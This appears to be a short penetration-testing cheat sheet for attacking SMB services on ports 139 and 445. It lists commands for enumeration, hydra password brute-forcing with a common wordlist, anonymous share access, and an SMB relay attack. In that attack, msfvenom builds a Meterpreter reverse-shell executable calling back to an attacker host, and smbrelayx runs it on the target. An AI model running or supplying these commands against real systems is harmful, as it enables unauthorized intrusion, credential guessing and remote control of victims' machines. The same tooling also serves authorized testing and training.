139/445 SMB
Home of many vulnerabilities usually leading to compromise. We'll cover automated and basic manual enumeration and the transfer of files.
Last updated: May 4th, 2023Automated Recon
nmap --script="smb*" -p 139,445 x.x.x.x
enum4linux -A x.x.x.x
Brute Force
hydra -t 4 -l username -P /usr/share/wordlists/rockyou.txt -vV x.x.x.x smb
Listing Shares
smbmap -H x.x.x.x
smbclient -N -L //x.x.x.x
Connecting
smbclient -N //x.x.x.x/share
smbclient -U user -P pass //x.x.x.x.share
mount -t cifs //x.x.x.x/sharename /mnt/smb -o guest
#smbrelay attack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port -f exe -o file_name.exe
smbrelayx -h x.x.x.x -e badexe.exe #use generated exe from above
psexec "<user>"@<ip> -
#meterpreter
use smb_login